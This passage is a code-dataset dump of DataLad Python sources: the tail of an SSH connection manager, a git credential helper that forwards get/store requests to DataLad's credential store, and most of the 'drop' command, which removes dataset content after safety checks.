\"\n \"Original exception: %s\",\n self._socket_dir, CapturedException(exc)\n )\n\n lgr.log(5,\n \"Found %d previous connections\",\n len(self._prev_connections))\n assure_initialized = ensure_initialized\n\n def get_connection(self, url, use_remote_annex_bundle=None, force_ip=False):\n\n sshri, identity_file = self._prep_connection_args(url)\n\n conhash = get_connection_hash(\n sshri.hostname,\n port=sshri.port,\n identity_file=identity_file or \"\",\n username=sshri.username,\n force_ip=force_ip,\n )\n # determine control master:\n ctrl_path = self.socket_dir / conhash\n\n # do we know it already?\n if ctrl_path in self._connections:\n return self._connections[ctrl_path]\n else:\n c = MultiplexSSHConnection(\n ctrl_path, sshri, identity_file=identity_file,\n use_remote_annex_bundle=use_remote_annex_bundle,\n force_ip=force_ip)\n self._connections[ctrl_path] = c\n return c\n\n def close(self, allow_fail=True, ctrl_path=None):\n \"\"\"Closes all connections, known to this instance.\n\n Parameters\n ----------\n allow_fail: bool, optional\n If True, swallow exceptions which might be thrown during\n connection.close, and just log them at DEBUG level\n ctrl_path: str, Path, or list of str or Path, optional\n If specified, only the path(s) provided would be considered\n \"\"\"\n if self._connections:\n ctrl_paths = [Path(p) for p in ensure_list(ctrl_path)]\n to_close = [c for c in self._connections\n # don't close if connection wasn't opened by SSHManager\n if self._connections[c].ctrl_path\n not in self._prev_connections and\n self._connections[c].ctrl_path.exists()\n and (not ctrl_paths\n or self._connections[c].ctrl_path in ctrl_paths)]\n if to_close:\n lgr.debug(\"Closing %d SSH connections...\", len(to_close))\n for cnct in to_close:\n f = self._connections[cnct].close\n if allow_fail:\n f()\n else:\n try:\n f()\n except Exception as exc:\n ce = CapturedException(exc)\n lgr.debug(\"Failed to close a connection: \"\n \"%s\", ce.message)\n self._connections = dict()\n\n\n# retain backward compat with 0.13.4 and earlier\n# should be ok since cfg already defined by the time this one is imported\nfrom .. import cfg\nif cfg.obtain('datalad.ssh.multiplex-connections'):\n SSHManager = MultiplexSSHManager\n SSHConnection = MultiplexSSHConnection\nelse:\n SSHManager = NoMultiplexSSHManager\n SSHConnection = NoMultiplexSSHConnection\n\n\ndef _quote_filename_for_scp(name):\n \"\"\"Manually escape shell goodies in a file name.\n\n Why manual? 
Because the author couldn't find a better way, and\n simply quoting the entire filename does not work with SCP's overly\n strict file matching criteria (likely a bug on their side).\n\n Hence this beauty:\n \"\"\"\n for s, t in (\n (' ', '\\\\ '),\n ('\"', '\\\\\"'),\n (\"'\", \"\\\\'\"),\n (\"&\", \"\\\\&\"),\n (\"|\", \"\\\\|\"),\n (\">\", \"\\\\>\"),\n (\"<\", \"\\\\<\"),\n (\";\", \"\\\\;\")):\n name = name.replace(s, t)\n return name\n" }, { "alpha_fraction": 0.6507764458656311, "alphanum_fraction": 0.6518598794937134, "avg_line_length": 42.72105407714844, "blob_id": "8604d6e5bc61c83ea72628b65f67f62cf751c3eb", "content_id": "2a7626d98df2e2fef50af71ad5e908d0a44c442f", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8307, "license_type": "permissive", "max_line_length": 80, "num_lines": 190, "path": "/datalad/local/gitcredential_datalad.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import sys\n\nfrom datalad.downloaders import (\n GitCredential,\n UserPassword,\n)\nfrom datalad.downloaders.providers import (\n AUTHENTICATION_TYPES,\n Providers,\n)\nfrom datalad.local.gitcredential import _credspec2dict\nfrom datalad import ConfigManager\n\ngit_credential_datalad_help = \"\"\"\\\nGit credential interface to DataLad's credential management system.\n\nIn order to use this, one needs to configure git to use the credential helper\n'datalad'. In the simplest case this can be achieved by 'git config --add\n--global credential.helper datalad'. This can be restricted to apply to\ncertain URLs only. See 'man gitcredentials' and\nhttp://docs.datalad.org/credentials.html for details.\n\nOnly DataLad's UserPassword-type credentials are supported. This helper\npasses standard 'get', 'store' actions on to the respective interfaces in\nDataLad.\nThe 'erase' action is not supported, since this is called by Git, when the\ncredentials didn't work for a URL. However, DataLad's providers store a regex\nfor matching URLs. That regex-credential combo may still be valid and simply\ntoo broad. We wouldn't want to auto-delete in that case. Another case is a\nsomewhat circular setup: Another credential-helper provided the credentials and\nis also used by DataLad. The provider config connecting it to DataLad could be\nintentionally broad. Deleting credentials from keyring but keeping the provider\nconfig pointing to them, on the other hand, would be even worse, as it would\ninvalidate the provider config and also means rejecting credentials w/o context.\nHence, this helper doesn't do anything on 'erase' at the moment.\n\nusage: git credential-datalad [option] <action>\n\noptions:\n -h Show this help.\n\nIf DataLad's config variable 'datalad.credentials.githelper.noninteractive' is\nset: Don't ask for user confirmation when storing to DataLad's credential\nsystem. This may fail if default names result in a conflict with existing ones.\nThis mode is used for DataLad's CI tests. 
Note, that this config can not\nreliably be read from local configs (a repository's .git/config or\n.datalad/config) as this credential helper when called by Git doesn't get to\nknow what repository it is operating on.\n\"\"\"\n\n\ndef git_credential_datalad():\n \"\"\"Entrypoint to query DataLad's credentials via git-credential\n \"\"\"\n\n if len(sys.argv) != 2 \\\n or sys.argv[1] == \"-h\" \\\n or sys.argv[1] not in ['get', 'store', 'erase']:\n help_explicit = sys.argv[1] == \"-h\"\n print(git_credential_datalad_help,\n file=sys.stdout if help_explicit else sys.stderr)\n sys.exit(0 if help_explicit else 1)\n\n cfg = ConfigManager()\n interactive = not cfg.obtain(\"datalad.credentials.githelper.noninteractive\")\n action = sys.argv[-1]\n attrs = _credspec2dict(sys.stdin)\n\n # This helper is intended to be called by git. While git-credential takes a\n # `url` property of the description, what it passes on is `protocol`, `host`\n # and potentially `path` (if instructed to useHttpPath by config).\n # For communication with datalad's credential system, we need to reconstruct\n # the url, though.\n assert 'protocol' in attrs.keys()\n assert 'host' in attrs.keys()\n if 'url' not in attrs:\n attrs['url'] = \"{protocol}://{host}{path}\".format(\n protocol=attrs.get('protocol'),\n host=attrs.get('host'),\n path=\"/{}\".format(attrs.get('path')) if 'path' in attrs else \"\"\n )\n\n # Get datalad's provider configs.\n providers = Providers.from_config_files()\n\n if action == 'get':\n _action_get(attrs, providers)\n elif action == 'store':\n _action_store(attrs, interactive, providers)\n\n\ndef _action_store(attrs, interactive, providers):\n # Determine the defaults to use for storing. In non-interactive mode,\n # this is what's going to be stored, in interactive mode user is\n # presented with them as default choice.\n # We don't really know what authentication type makes sense to store in\n # the provider config (this would be relevant for datalad using those\n # credentials w/o git).\n # However, pick 'http_basic_auth' in case of HTTP(S) URL and 'none'\n # otherwise as the default to pass into store routine.\n if attrs.get('protocol') in ['http', 'https']:\n authentication_type = 'http_basic_auth'\n else:\n authentication_type = 'none'\n # If we got a `path` component from git, usehttppath is set and thereby\n # git was instructed to include it when matching. Hence, do the same.\n url_re = \"{pr}://{h}{p}.*\".format(pr=attrs.get('protocol'),\n h=attrs.get('host'),\n p=\"/\" + attrs.get('path')\n if \"path\" in attrs.keys() else \"\")\n name = attrs.get('host')\n credential_name = name\n credential_type = \"user_password\"\n if not interactive:\n\n # TODO: What about credential labels? This could already exist as\n # well. However, it's unlikely since the respective\n # \"service name\" for keyring is prepended with \"datalad-\".\n # For the same reason of how the keyring system is used by\n # datalad it's not very transparently accessible what labels\n # we'd need to check for. Rather than encoding knowledge about\n # datalad's internal handling here, let's address that in\n # datalad's provider and credential classes and have an easy\n # check to be called from here.\n if any(p.name == name for p in providers):\n print(f\"Provider name '{name}' already exists. 
This can't be \"\n \"resolved in non-interactive mode.\",\n file=sys.stderr)\n\n authenticator_class = AUTHENTICATION_TYPES[authentication_type]\n saved_provider = providers._store_new(\n url=attrs.get('url'),\n authentication_type=authentication_type,\n authenticator_class=authenticator_class,\n url_re=url_re,\n name=name,\n credential_name=credential_name,\n credential_type=credential_type,\n level='user'\n )\n else:\n # use backend made for annex special remotes for interaction from a\n # subprocess whose stdin/stdout are in use for communication with\n # its parent\n from datalad.ui import ui\n ui.set_backend('annex')\n\n # ensure default is first in list (that's how `enter_new` determines\n # it's the default)\n auth_list = AUTHENTICATION_TYPES.copy()\n auth_list.pop(authentication_type, None)\n auth_list = [authentication_type] + list(auth_list.keys())\n\n saved_provider = providers.enter_new(\n url=attrs.get('url'),\n auth_types=auth_list,\n url_re=url_re,\n name=name,\n credential_name=credential_name,\n credential_type=credential_type)\n saved_provider.credential.set(user=attrs['username'],\n password=attrs['password'])\n\n\ndef _action_get(attrs, providers):\n # query datalad and report if it knows anything, or be silent\n # git handles the rest\n provider = providers.get_provider(attrs['url'],\n only_nondefault=True)\n if provider is None \\\n or provider.credential is None \\\n or not isinstance(provider.credential, UserPassword):\n # datalad doesn't know or only has a non UserPassword credential for\n # this URL - create empty entry\n dlcred = UserPassword()\n else:\n dlcred = provider.credential\n # Safeguard against circular querying. We are a git-credential-helper.\n # If we find a datalad credential that tells DataLad to query Git, we\n # need to ignore it. 
Otherwise we'd end up right here again.\n if isinstance(provider.credential, GitCredential):\n # Just return the unchanged description we got from Git\n for k, v in attrs.items():\n print('{}={}'.format(k, v))\n return\n\n for dlk, gitk in (('user', 'username'), ('password', 'password')):\n val = dlcred.get(dlk)\n if val is not None:\n print('{}={}'.format(gitk, val))\n" }, { "alpha_fraction": 0.5610083937644958, "alphanum_fraction": 0.5615088939666748, "avg_line_length": 37.24282455444336, "blob_id": "73e3990ab1c7bd43b2280cf534a62a3856ed1d86", "content_id": "8bc7047e37499c2097e30bda41a373f4540f60b8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31971, "license_type": "permissive", "max_line_length": 87, "num_lines": 836, "path": "/datalad/distributed/drop.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for dropping dataset content\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom itertools import chain\nimport warnings\n\nfrom datalad.core.local.status import get_paths_by_ds\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n recursion_flag,\n recursion_limit,\n)\nfrom datalad.interface.results import (\n annexjson2result,\n results_from_annex_noinfo,\n success_status_map,\n)\nfrom datalad.runner.exception import CommandError\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.support.param import Parameter\nfrom datalad.utils import (\n ensure_list,\n rmtree,\n)\n\nlgr = logging.getLogger('datalad.distributed.drop')\n\n\n@build_doc\nclass Drop(Interface):\n \"\"\"Drop content of individual files or entire (sub)datasets\n\n This command is the antagonist of 'get'. It can undo the retrieval of file\n content, and the installation of subdatasets.\n\n Dropping is a safe-by-default operation. Before dropping any information,\n the command confirms the continued availability of file-content (see e.g.,\n configuration 'annex.numcopies'), and the state of all dataset branches\n from at least one known dataset sibling. Moreover, prior removal of an\n entire dataset annex, that it is confirmed that it is no longer marked\n as existing in the network of dataset siblings.\n\n Importantly, all checks regarding version history availability and local\n annex availability are performed using the current state of remote\n siblings as known to the local dataset. This is done for performance\n reasons and for resilience in case of absent network connectivity. 
To\n ensure decision making based on up-to-date information, it is advised to\n execute a dataset update before dropping dataset components.\n \"\"\"\n _examples_ = [\n {'text': \"Drop single file content\",\n 'code_py': \"drop('path/to/file')\",\n 'code_cmd': \"datalad drop <path/to/file>\"},\n {'text': \"Drop all file content in the current dataset\",\n 'code_py': \"drop('.')\",\n 'code_cmd': \"datalad drop\"},\n {'text': \"Drop all file content in a dataset and all its subdatasets\",\n 'code_py': \"drop(dataset='.', recursive=True)\",\n 'code_cmd': \"datalad drop -d <path/to/dataset> -r\"},\n {'text': \"Disable check to ensure the configured minimum number of \"\n \"remote sources for dropped data\",\n 'code_py': \"drop(path='path/to/content', reckless='availability')\",\n 'code_cmd': \"datalad drop <path/to/content> --reckless availability\"},\n {'text': 'Drop (uninstall) an entire dataset '\n '(will fail with subdatasets present)',\n 'code_py': \"drop(what='all')\",\n 'code_cmd': \"datalad drop --what all\"},\n {'text': 'Kill a dataset recklessly with any existing subdatasets too'\n '(this will be fast, but will disable any and all safety '\n 'checks)',\n 'code_py': \"drop(what='all', reckless='kill', recursive=True)\",\n 'code_cmd': \"datalad drop --what all, --reckless kill --recursive\"},\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n metavar=\"DATASET\",\n doc=\"\"\"specify the dataset to perform drop from.\n If no dataset is given, the current working directory is used\n as operation context\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar=\"PATH\",\n doc=\"path of a dataset or dataset component to be dropped\",\n nargs=\"*\",\n constraints=EnsureStr() | EnsureNone()),\n reckless=Parameter(\n args=(\"--reckless\",),\n doc=\"\"\"disable individual or all data safety measures that would\n normally prevent potentially irreversible data-loss.\n With 'modification', unsaved modifications in a dataset will not be\n detected. This improves performance at the cost of permitting\n potential loss of unsaved or untracked dataset components.\n With 'availability', detection of dataset/branch-states that are\n only available in the local dataset, and detection of an\n insufficient number of file-content copies will be disabled.\n Especially the latter is a potentially expensive check which might\n involve numerous network transactions.\n With 'undead', detection of whether a to-be-removed local annex is\n still known to exist in the network of dataset-clones is disabled.\n This could cause zombie-records of invalid file availability.\n With 'kill', all safety-checks are disabled.\"\"\",\n constraints=EnsureChoice(\n 'modification', 'availability', 'undead', 'kill', None)),\n what=Parameter(\n args=(\"--what\",),\n doc=\"\"\"select what type of items shall be dropped.\n With 'filecontent', only the file content (git-annex keys) of files\n in a dataset's worktree will be dropped.\n With 'allkeys', content of any version of any file in any branch\n (including, but not limited to the worktree) will be dropped. 
This\n effectively empties the annex of a local dataset.\n With 'datasets', only complete datasets will be dropped (implies\n 'allkeys' mode for each such dataset), but no filecontent will be\n dropped for any files in datasets that are not dropped entirely.\n With 'all', content for any matching file or dataset will be dropped\n entirely.\n \"\"\",\n # TODO add 'unwanted'\n constraints=EnsureChoice('filecontent', 'allkeys', 'datasets', 'all')),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n jobs=jobs_opt,\n check=Parameter(\n args=(\"--nocheck\",),\n doc=\"\"\"DEPRECATED: use '--reckless availability'\"\"\",\n action=\"store_false\",\n dest='check'),\n if_dirty=Parameter(\n args=(\"--if-dirty\",),\n doc=\"\"\"DEPRECATED and IGNORED: use --reckless instead\"\"\",),\n )\n\n @staticmethod\n @datasetmethod(name='drop')\n @eval_results\n def __call__(\n path=None,\n *,\n what='filecontent',\n reckless=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n jobs=None,\n # deprecated\n check=None,\n if_dirty=None):\n\n # TODO if reckless is None, initialize from a potential config setting\n # left behind by a reckless clone\n\n # proper spelling of mode switches is critical for implementation\n # below. double-check, also in Python API usage\n # TODO consider making a generic helper\n for label, value in (('what', what), ('reckless', reckless)):\n try:\n Drop._params_[label].constraints(value)\n except ValueError as e:\n raise ValueError(\n f\"Invalid '{label}' parameter value of: \"\n f\"{repr(value)} [{str(e)}]\") from e\n\n if check is not None:\n warnings.warn(\n \"The `check` argument of `datalad drop` is deprecated, \"\n \"use the `reckless` argument instead.\",\n DeprecationWarning)\n if if_dirty is not None:\n warnings.warn(\n \"The `if_dirty` argument of `datalad drop` is ignored, \"\n \"it can be removed for a safe-by-default behavior. For \"\n \"other cases consider the `reckless` argument.\",\n DeprecationWarning)\n\n if check is False:\n if reckless is not None:\n raise ValueError(\n 'Must not use deprecated `check` argument, and new '\n '`reckless` argument together with `datalad drop`.')\n reckless = 'availability'\n\n if what in ('all', 'datasets') and reckless == 'kill' and not recursive:\n raise ValueError(\n 'A reckless kill is requested but no recursion flag is set. '\n \"With 'kill' no checks for subdatasets will be made, \"\n 'acknowledge by setting the recursive flag')\n\n # we cannot test for what=='allkeys' and path==None here,\n # on per each dataset. otherwise we will not be able to drop\n # from a subdataset, by given its path -- desirable MIH thinks\n\n ds = require_dataset(dataset, check_installed=True, purpose='drop')\n\n res_props = dict(\n logger=lgr,\n refds=ds.path,\n )\n # if not paths are given, there will still be a single dataset record\n # with paths==None\n paths_by_ds, errors = get_paths_by_ds(\n ds,\n dataset,\n ensure_list(path),\n # XXX this needs more thought!! 
Maybe this is what the mode should be\n # in general?!\n # when we want to drop entire datasets, it is much more useful\n # to have subdatasets be their own record\n subdsroot_mode='sub'\n if what in ('all', 'datasets')\n else 'rsync',\n )\n for e in errors:\n yield dict(\n action='drop',\n path=str(e),\n status='error',\n message=('path not underneath the reference dataset %s', ds),\n **res_props)\n # we are not returning, a caller could decide on failure mode\n\n if what in ('all', 'datasets') and _paths_atunder_dir(\n paths_by_ds, ds.pathobj.cwd()):\n raise RuntimeError(\n 'refuse to perform actions that would remove the current '\n 'working directory')\n\n lgr.debug('Discovered %i datasets to drop (from)', len(paths_by_ds))\n\n # a dataset paths are normalized and guaranteed to be under the same\n # root dataset\n # we want to start from the leave datasets, such that all discovered\n # dataset can be processed independently\n for dpath in sorted(paths_by_ds.keys(), reverse=True):\n d = Dataset(dpath)\n lgr.debug('Starting to drop %s at %s', what, d)\n for res in _drop_dataset(\n d,\n paths_by_ds[dpath],\n what=what,\n reckless=reckless,\n # recursion from any of the given paths!\n recursive=recursive,\n recursion_limit=recursion_limit,\n jobs=jobs):\n yield dict(res, **res_props)\n lgr.debug('Finished dropping %s at %s', what, d)\n return\n\n\ndef _paths_atunder_dir(pbd, dirpath):\n \"\"\"Whether any of the paths is at or under a reference path\n\n Parameters\n ----------\n pbd: dict\n Dataset path dict is produced by get_paths_by_ds()\n dirpath: Path\n Reference path\n\n Returns\n -------\n bool\n \"\"\"\n for dpath, paths in pbd.items():\n for p in ([dpath] if paths is None else paths):\n if p == dirpath or p in dirpath.parents:\n return True\n return False\n\n\ndef _drop_dataset(ds, paths, what, reckless, recursive, recursion_limit, jobs):\n lgr.debug('Start dropping for %s', ds)\n # we know that any given path is part of `ds` and not any of its\n # subdatasets!\n\n # by-passing this completely with reckless=kill\n if recursive and not reckless == 'kill':\n # process subdatasets first with recursion\n for sub in ds.subdatasets(\n # must be resolved!\n path=paths or None,\n # nothing to drop with unavailable subdatasets\n state='present',\n # we can use the full recursion depth, only the first layer\n # of calls to _drop_dataset() must/can have recursive=True\n recursive=recursive,\n recursion_limit=recursion_limit,\n # start reporting with the leaves\n bottomup=True,\n result_xfm='datasets',\n on_failure='ignore',\n return_type='generator',\n result_renderer='disabled'):\n yield from _drop_dataset(\n ds=sub,\n # everything, the entire subdataset is matching a given path\n paths=None,\n what=what,\n reckless=reckless,\n recursive=False,\n recursion_limit=None,\n jobs=jobs)\n\n if not ds.pathobj.exists():\n # basic protection against something having wiped it out already.\n # should not happen, but better than a crash, if it does\n yield dict(\n action='drop',\n path=ds.path,\n status='notneeded',\n message=\"does not exist\",\n type='dataset',\n )\n return\n\n if paths is not None and paths != [ds.pathobj] and what == 'all':\n if recursive and reckless == 'kill':\n # check if any paths contains a subdataset, and if so, drop it to\n # ensure its not left behind\n for sub in ds.subdatasets(\n # just check for subds at the provided path\n path=paths,\n state='present',\n recursive=recursive,\n recursion_limit=recursion_limit,\n result_xfm='datasets',\n on_failure='ignore',\n 
return_type='generator',\n result_renderer='disabled'):\n if sub is not None:\n # there is a subdataset underneath the given path\n yield from _drop_dataset(\n ds=sub,\n # everything underneath the subds can go\n paths=None,\n what=what,\n reckless=reckless,\n recursive=False,\n recursion_limit=None,\n jobs=jobs)\n # so we have paths constraints that prevent dropping the full dataset\n lgr.debug('Only dropping file content for given paths in %s, '\n 'allthough instruction was to drop %s', ds, what)\n what = 'filecontent'\n\n repo = ds.repo\n is_annex = isinstance(repo, AnnexRepo)\n\n # first critical checks that might prevent further operation\n had_fatality = False\n for res in _fatal_pre_drop_checks(\n ds, repo, paths, what, reckless, is_annex):\n had_fatality = True\n yield res\n if had_fatality:\n return\n\n # next check must come AFTER the modification checks above, otherwise\n # remove() could not rely on the modification detection above\n if paths is not None and paths != [ds.pathobj] and what == 'datasets':\n # so we have paths constraints that prevent dropping the full dataset\n # there is nothing to do here, but to drop keys, which we must not\n # done\n return\n\n # now conditional/informative checks\n yield from _pre_drop_checks(ds, repo, paths, what, reckless, is_annex)\n\n if is_annex and what == 'filecontent':\n yield from _drop_files(\n ds,\n repo,\n # give paths or '.' with no constraint\n paths=[str(p.relative_to(ds.pathobj))\n for p in paths] if paths else '.',\n force=reckless in ('availability', 'kill'),\n jobs=jobs,\n )\n # end it here for safety, the rest of the function deals with\n # dropping more and more fundamentally\n return\n\n drop_all_errored = False\n if is_annex and what in ('allkeys', 'datasets', 'all') \\\n and not reckless == 'kill':\n for r in _drop_allkeys(\n ds,\n repo,\n force=reckless in ('availability',),\n jobs=jobs):\n res = dict(\n action='drop',\n type='key',\n # use the path of the containing dataset\n # using the location of the key does not add any\n # practical value, and is expensive to obtain\n path=ds.path,\n status='ok' if r.get('success') else 'error',\n key=r.get('key'),\n )\n # pull any note, and rename recommended parameter to\n # avoid confusion\n message = r.get('note', '').replace(\n '--force',\n '--reckless availability')\n if message:\n res['message'] = message\n error_messages = r.get('error-messages')\n if error_messages:\n res['error_message'] = '\\n'.join(\n m.strip() for m in error_messages\n )\n # play safe, if there is no status, assume error\n if res.get('status', 'error') != 'ok':\n drop_all_errored = True\n yield res\n\n if drop_all_errored:\n # end it here, if there is any indication that wiping out the\n # repo is unsafe\n return\n\n if what in ('all', 'datasets'):\n yield from _kill_dataset(ds)\n lgr.debug('Done dropping for %s', ds)\n return\n\n\ndef _fatal_pre_drop_checks(ds, repo, paths, what, reckless, is_annex):\n if what == 'allkeys' and paths is not None \\\n and paths != [ds.pathobj]:\n yield dict(\n action='drop',\n path=ds.path,\n type='dataset',\n status='impossible',\n message=(\n 'cannot drop %s, with path constraints given: %s',\n what, paths),\n )\n return\n\n if what in ('all', 'datasets') and not reckless == 'kill':\n # we must not have subdatasets anymore\n # if we do, --recursive was forgotten\n subdatasets = ds.subdatasets(\n path=paths,\n # we only care about the present ones\n state='present',\n # first-level is enough, if that has none, there will be none\n recursive=False,\n 
result_xfm='paths',\n result_renderer='disabled')\n if subdatasets:\n yield dict(\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='error',\n message=('cannot drop dataset, subdataset(s) still present '\n '(forgot --recursive?): %s', subdatasets)\n )\n # this is fatal\n return\n\n if what in ('all', 'datasets') \\\n and reckless not in ('availability', 'kill') \\\n and (paths is None or paths == [ds.pathobj]):\n unpushed = _detect_unpushed_revs(repo, is_annex)\n if unpushed:\n yield dict(\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='error',\n message=(\n \"to-be-dropped dataset has revisions that \"\n \"are not available at any known sibling. Use \"\n \"`datalad push --to ...` to push \"\n \"these before dropping the local dataset, \"\n \"or ignore via `--reckless availability`. \"\n \"Unique revisions: %s\",\n unpushed)\n )\n # this is fatal\n return\n\n if is_annex and what in ('all', 'datasets') \\\n and reckless not in ('undead', 'kill'):\n # this annex is about to die, test if it is still considered\n # not-dead. if so, complain to avoid generation of zombies\n # (annexed that are floating around, but are actually dead).\n # if repo.uuid is None, git annex init never ran, and we can skip this\n remotes_that_know_this_annex = None if repo.uuid is None else [\n r\n for r in _detect_nondead_annex_at_remotes(repo, repo.uuid)\n # filter out \"here\"\n if r is not None\n ]\n if remotes_that_know_this_annex:\n yield dict(\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='error',\n message=(\n \"to-be-deleted local annex not declared 'dead' at the \"\n \"following siblings. Announce death \"\n \"(`git annex dead here` + `datalad push --to ...`), \"\n \"or ignore via `--reckless undead`: %s\",\n remotes_that_know_this_annex)\n )\n # this is fatal\n return\n\n if reckless not in ('modification', 'kill'):\n # do a cheaper status run to discover any kind of modification and\n # generate results based on the `what` mode of operation\n for res in ds.status(\n path=paths,\n # untracked content will not be reported on further down\n # must catch it here\n untracked='normal',\n # downstream code can handle non-annex/annex distinction\n # avoid expensive evaluation here\n annex=False,\n # we only need to inspect a subdataset's state in case\n # we want to drop it completely\n eval_subdataset_state='commit'\n if what in ('all', 'datasets') else 'no',\n # recursion is handled outside this function\n recursive=False,\n result_renderer='disabled',\n return_type='generator',\n on_failure='ignore'):\n state = res.get('state')\n if state == 'clean':\n # nothing to worry about, nothing to communicate\n continue\n elif state in ('modified', 'untracked'):\n yield dict(\n res,\n status='impossible',\n action='drop',\n message=f'cannot drop {state} content, save first',\n )\n # we are not aborting nevetheless. 
in normal conditions\n # the above result will stop processing, but if desired\n # we could go on\n else:\n lgr.debug(\n 'Status record not considered for drop '\n 'state inspection: %s', res)\n\n\ndef _pre_drop_checks(ds, repo, paths, what, reckless, is_annex):\n if not is_annex and reckless not in ('datasets', 'kill'):\n # we cannot drop content in non-annex repos, issue same\n # 'notneeded' as for git-file in annex repo\n for p in paths or [ds.path]:\n yield dict(\n action='drop',\n path=str(p),\n status='notneeded',\n message=\"no annex'ed content\",\n )\n # continue, this is nothing fatal\n\n if not is_annex and what in ('allkeys', 'unwanted') \\\n and not reckless == 'kill':\n # these drop modes are meaningless without an annex\n yield dict(\n action='drop',\n path=ds.path,\n status='notneeded',\n message=\"dataset with no annex\",\n type='dataset',\n )\n # continue, this is nothing fatal\n\n\ndef _detect_unpushed_revs(repo, consider_managed_branches):\n \"\"\"Check if all local branch states (and HEAD) are available at a remote\n\n There need not be a 1:1 correspondence. What is tested is whether\n each commit corresponding to a local branch tip (or HEAD), is also an\n ancestor of any remote branch. It is not required that there is a single\n remote that has all commits.\n\n This only uses the state of remotes known to the local remote state.\n No remote synchronization is performed.\n\n Parameters\n ----------\n repo: GitRepo\n Repository to evaluated\n consider_managed_branches: bool\n Whether to enable handling of managed branches.\n\n Returns\n -------\n list\n Names of local states/refs that are no available at a remote.\n \"\"\"\n if consider_managed_branches:\n # consolidate corresponding branches to get reliable detection\n repo.localsync(managed_only=True)\n # we do not want to check this for any managed branches\n # that are not meant to be pushed without consolidation\n # or even at all (incl. 
git-annex, it can behave in complex ways)\n local_refs = [\n lb for lb in repo.get_branches()\n if not (not consider_managed_branches\n or lb == 'git-annex' or repo.is_managed_branch(lb))]\n if not repo.get_active_branch():\n # check for HEAD, in case we are on a detached HEAD\n local_refs.append('HEAD')\n # extend to tags?\n remote_refs = repo.get_remote_branches()\n\n unpushed_refs = [\n local_ref\n for local_ref in local_refs\n if not any(repo.is_ancestor(local_ref, remote_ref)\n for remote_ref in remote_refs)\n ]\n return unpushed_refs\n\n\ndef _detect_nondead_annex_at_remotes(repo, annex_uuid):\n \"\"\"Return list of remote names that know about a given (not-dead) annex\n\n This only uses the state of remotes known to the local remote state.\n No remote synchronization is performed.\n\n Parameters\n ----------\n repo: AnnexRepo or GitRepo\n Repository to evaluated\n annex_uuid: str\n UUID string of a particular annex\n\n Returns\n -------\n list\n Names of any matching remote, the local repository is indicated using\n a `None` label.\n \"\"\"\n # build the refs for all remotes and local\n remotes_w_registration = []\n for remote in chain([''], repo.get_remotes()):\n refprefix = '{}{}git-annex:'.format(\n remote,\n '/' if remote else '',\n )\n uuid_known = False\n try:\n for line in repo.call_git_items_(\n ['cat-file', '-p', refprefix + 'uuid.log']):\n if line.startswith(annex_uuid):\n # use None to label the local repo\n uuid_known = True\n break\n except CommandError as e:\n CapturedException(e)\n # this is not a problem per-se, logged above, just continue\n continue\n if not uuid_known:\n # if an annex id is not even in the uuid.log, we can stop here\n # (for this remote)\n continue\n\n # annex is known, but maybe is declared dead already, must check\n # trust.log in addition\n try:\n for line in repo.call_git_items_(\n ['cat-file', '-p', refprefix + 'trust.log']):\n columns = line.split()\n if columns[0] == annex_uuid:\n # not known if dead\n uuid_known = False if columns[1] == 'X' else True\n break\n except CommandError as e:\n CapturedException(e)\n # this is not a problem per-se, logged above, just continue\n continue\n finally:\n if uuid_known:\n remotes_w_registration.append(remote or None)\n return(remotes_w_registration)\n\n\ndef _kill_dataset(ds):\n \"\"\"This is a harsh internal helper: it will wipe out a dataset, no checks\n \"\"\"\n # figure out whether we should be nice to a superdataset later on\n has_super = ds.get_superdataset(topmost=False, registered_only=True)\n # Close any possibly associated process etc with underlying repo.\n # Otherwise - rmtree could fail to remove e.g. 
under NFS which would\n # still have some files opened by them (thus having .nfs00000xxxx\n # files) forbidding rmdir to work in rmtree\n ds.close()\n rmtree(ds.path)\n # invalidate loaded ConfigManager -- datasets are singletons!!\n ds._cfg = None\n if has_super:\n # recreate an empty mountpoint to make Git happier\n ds.pathobj.mkdir(exist_ok=True)\n yield dict(\n # keep uninstall to please the gods of a distant past\n #action='drop',\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='ok',\n )\n\n\ndef _drop_allkeys(ds, repo, force=False, jobs=None):\n \"\"\"\n \"\"\"\n assert not (repo.dot_git / 'annex').is_symlink(), \\\n \"Dropping from a symlinked annex is unsupported to prevent data-loss\"\n\n cmd = ['drop', '--all']\n if force:\n cmd.append('--force')\n if jobs:\n cmd.extend(['--jobs', str(jobs)])\n\n try:\n yield from repo._call_annex_records_items_(cmd)\n except CommandError as e:\n # pick up the results captured so far and yield them\n # the error will be amongst them\n yield from e.kwargs.get('stdout_json', [])\n\n\ndef _drop_files(ds, repo, paths, force=False, jobs=None):\n \"\"\"Helper to drop content in datasets.\n\n Parameters\n ----------\n repo : AnnexRepo\n 